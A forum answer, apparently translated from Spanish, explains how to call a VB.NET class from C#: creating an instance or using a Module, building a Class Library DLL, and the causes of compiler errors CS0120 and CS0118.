Why can not you use your class as it is in your static method? What prevents you? Let's see, the first thing obviously the class should be published, which I think you've already done:

Public Class MenaPE

after recompiling, from your application in C # (no matter how static it is) simply do:

MenaPE.MenaPE mena = new MenaPE.MenaPE();
mena.Run(tusargumentos);

To call a non-static method, first create an instance of the class, then call the method.

If you want the vb.net class to be static, what you should do instead of using a class ( Class ) use a Module ( Module ):

Public Module MenaPE

And then you could use it as:

MenaPE.MenaPE.Run(....

You can follow these steps:

  • Create a new project in Visual Studio.
  • Choose the language (C # or VB.Net, in your case VB.Net).
  • Choose the type of project "Class Library".
  • There create your class and put your code
  • Compile the project and it will generate a dll
  • Now that dll you will reference in your other project to access their methods and functions. Here you can see a tutorial more detailed on how to do it.

    According to what I can assimilate with the question (which is not very descriptive in the error) and your comments these are the conclusions that I can draw:

    Error CS0120 : The official documentation says that This error occurs when you try to access a field, property or method in a static way when in fact it is not.

    Example:

    Error CS0118 : According to the documentation in English (I did not find it in Spanish) are using a namespace (name space) as a class . As I can see, your project has the same name as the class you need.
